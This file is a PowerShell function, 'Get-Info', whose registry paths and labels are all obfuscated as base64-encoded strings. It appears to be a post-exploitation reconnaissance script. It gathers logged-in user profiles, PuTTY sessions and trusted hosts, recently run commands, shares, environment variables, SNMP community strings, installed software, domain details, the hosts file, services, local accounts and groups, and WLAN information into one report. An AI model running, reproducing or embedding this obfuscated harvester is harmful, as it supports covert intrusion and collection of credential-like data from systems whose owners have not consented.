
function Get-Info 
{
    [CmdletBinding()]
    Param ()
    function f4(${f2}, ${f1},${f3}) 
    { 
        if (${f3} -eq "no"){${4} = get-item ${f2}} 
        else{${4} = get-childitem ${f2}} 
        ${4} | 
        % { 
        ${2} = gp $_.PSPath 
        ForEach (${3} in $_.Property) 
        { 
        if (${f1} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBsAGwA')))) {${2}.${3}} 
        elseif (${f1} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBsAGwAbgBhAG0AZQA=')))){${3}} 
        else {${2}.${f1};break} 
        }}} 
    ${1} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TABvAGcAZwBlAGQAIABpAG4AIAB1AHMAZQByAHMAOgAKAA=='))) + ((f4 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aABrAGwAbQA6AFwAcwBvAGYAdAB3AGEAcgBlAFwAbQBpAGMAcgBvAHMAbwBmAHQAXAB3AGkAbgBkAG8AdwBzACAAbgB0AFwAYwB1AHIAcgBlAG4AdAB2AGUAcgBzAGkAbwBuAFwAcAByAG8AZgBpAGwAZQBsAGkAcwB0AA=='))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cAByAG8AZgBpAGwAZQBpAG0AYQBnAGUAcABhAHQAaAA=')))) -join "`r`n") 
    ${1} = ${1} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAKACAAUABvAHcAZQByAHMAaABlAGwAbAAgAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAA6AAoA'))) + ((f4 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aABrAGwAbQA6AFwAcwBvAGYAdAB3AGEAcgBlAFwAbQBpAGMAcgBvAHMAbwBmAHQAXABwAG8AdwBlAHIAcwBoAGUAbABsAA=='))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBsAGwAbgBhAG0AZQA='))))  -join "`r`n") 
    ${1} = ${1} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAKACAAUAB1AHQAdAB5ACAAdAByAHUAcwB0AGUAZAAgAGgAbwBzAHQAcwA6AAoA'))) + ((f4 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aABrAGMAdQA6AFwAcwBvAGYAdAB3AGEAcgBlAFwAcwBpAG0AbwBuAHQAYQB0AGgAYQBtAFwAcAB1AHQAdAB5AA=='))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBsAGwAbgBhAG0AZQA='))))  -join "`r`n") 
    ${1} = ${1} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAKACAAUAB1AHQAdAB5ACAAcwBhAHYAZQBkACAAcwBlAHMAcwBpAG8AbgBzADoACgA='))) + ((f4 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aABrAGMAdQA6AFwAcwBvAGYAdAB3AGEAcgBlAFwAcwBpAG0AbwBuAHQAYQB0AGgAYQBtAFwAcAB1AHQAdAB5AFwAcwBlAHMAcwBpAG8AbgBzAA=='))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBsAGwA'))))  -join "`r`n") 
    ${1} = ${1} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAKACAAUgBlAGMAZQBuAHQAbAB5ACAAdQBzAGUAZAAgAGMAbwBtAG0AYQBuAGQAcwA6AAoA'))) + ((f4 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aABrAGMAdQA6AFwAcwBvAGYAdAB3AGEAcgBlAFwAbQBpAGMAcgBvAHMAbwBmAHQAXAB3AGkAbgBkAG8AdwBzAFwAYwB1AHIAcgBlAG4AdAB2AGUAcgBzAGkAbwBuAFwAZQB4AHAAbABvAHIAZQByAFwAcgB1AG4AbQByAHUA'))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBsAGwA'))) "no")  -join "`r`n") 
    ${1} = ${1} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAKACAAUwBoAGEAcgBlAHMAIABvAG4AIAB0AGgAZQAgAG0AYQBjAGgAaQBuAGUAOgAKAA=='))) + ((f4 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aABrAGwAbQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABzAGUAcgB2AGkAYwBlAHMAXABMAGEAbgBtAGEAbgBTAGUAcgB2AGUAcgBcAFMAaABhAHIAZQBzAA=='))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBsAGwA'))) "no")  -join "`r`n") 
    ${1} = ${1} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAKACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdgBhAHIAaQBhAGIAbABlAHMAOgAKAA=='))) + ((f4 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aABrAGwAbQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABDAG8AbgB0AHIAbwBsAFwAUwBlAHMAcwBpAG8AbgAgAE0AYQBuAGEAZwBlAHIAXABFAG4AdgBpAHIAbwBuAG0AZQBuAHQA'))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBsAGwA'))) "no")  -join "`r`n") 
    ${1} = ${1} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAKACAATQBvAHIAZQAgAGQAZQB0AGEAaQBsAHMAIABmAG8AcgAgAGMAdQByAHIAZQBuAHQAIAB1AHMAZQByADoACgA='))) + ((f4 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aABrAGMAdQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0AA=='))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBsAGwA'))) "no")  -join "`r`n") 
    ${1} = ${1} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAKACAAUwBOAE0AUAAgAGMAbwBtAG0AdQBuAGkAdAB5ACAAcwB0AHIAaQBuAGcAcwA6AAoA'))) + ((f4 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aABrAGwAbQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABzAGUAcgB2AGkAYwBlAHMAXABzAG4AbQBwAFwAcABhAHIAYQBtAGUAdABlAHIAcwBcAHYAYQBsAGkAZABjAG8AbQBtAHUAbgBpAHQAaQBlAHMA'))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBsAGwA'))) "no")  -join "`r`n") 
    ${1} = ${1} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAKACAAUwBOAE0AUAAgAGMAbwBtAG0AdQBuAGkAdAB5ACAAcwB0AHIAaQBuAGcAcwAgAGYAbwByACAAYwB1AHIAcgBlAG4AdAAgAHUAcwBlAHIAOgAKAA=='))) + ((f4 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aABrAGMAdQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABzAGUAcgB2AGkAYwBlAHMAXABzAG4AbQBwAFwAcABhAHIAYQBtAGUAdABlAHIAcwBcAHYAYQBsAGkAZABjAG8AbQBtAHUAbgBpAHQAaQBlAHMA'))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBsAGwA'))) "no")  -join "`r`n") 
    ${1} = ${1} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAKACAASQBuAHMAdABhAGwAbABlAGQAIABBAHAAcABsAGkAYwBhAHQAaQBvAG4AcwA6AAoA'))) + ((f4 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aABrAGwAbQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAVQBuAGkAbgBzAHQAYQBsAGwA'))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZABpAHMAcABsAGEAeQBuAGEAbQBlAA=='))))  -join "`r`n") 
    ${1} = ${1} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAKACAASQBuAHMAdABhAGwAbABlAGQAIABBAHAAcABsAGkAYwBhAHQAaQBvAG4AcwAgAGYAbwByACAAYwB1AHIAcgBlAG4AdAAgAHUAcwBlAHIAOgAKAA=='))) + ((f4 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aABrAGMAdQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAVQBuAGkAbgBzAHQAYQBsAGwA'))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZABpAHMAcABsAGEAeQBuAGEAbQBlAA=='))))  -join "`r`n") 
    ${1} = ${1} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAKACAARABvAG0AYQBpAG4AIABOAGEAbQBlADoACgA='))) + ((f4 $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aABrAGwAbQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwARwByAG8AdQBwACAAUABvAGwAaQBjAHkAXABIAGkAcwB0AG8AcgB5AFwA'))) $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBsAGwA'))) "no")  -join "`r`n") 
    ${1} = ${1} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAKACAAQwBvAG4AdABlAG4AdABzACAAbwBmACAALwBlAHQAYwAvAGgAbwBzAHQAcwA6AAoA'))) + ((get-content -path $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGQAcgBpAHYAZQByAHMAXABlAHQAYwBcAGgAbwBzAHQAcwA='))))  -join "`r`n") 
    ${1} = ${1} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAKACAAUgB1AG4AbgBpAG4AZwAgAFMAZQByAHYAaQBjAGUAcwA6AAoA'))) + ((net start) -join "`r`n") 
    ${1} = ${1} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAKACAAQQBjAGMAbwB1AG4AdAAgAFAAbwBsAGkAYwB5ADoACgA='))) + ((net accounts)  -join "`r`n") 
    ${1} = ${1} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAKACAATABvAGMAYQBsACAAdQBzAGUAcgBzADoACgA='))) + ((net user)  -join "`r`n") 
    ${1} = ${1} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAKACAATABvAGMAYQBsACAARwByAG8AdQBwAHMAOgAKAA=='))) + ((net localgroup)  -join "`r`n") 
    ${1} = ${1} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('CgAKACAAVwBMAEEATgAgAEkAbgBmAG8AOgAKAA=='))) + ((netsh wlan show all)  -join "`r`n") 
    ${1}
}
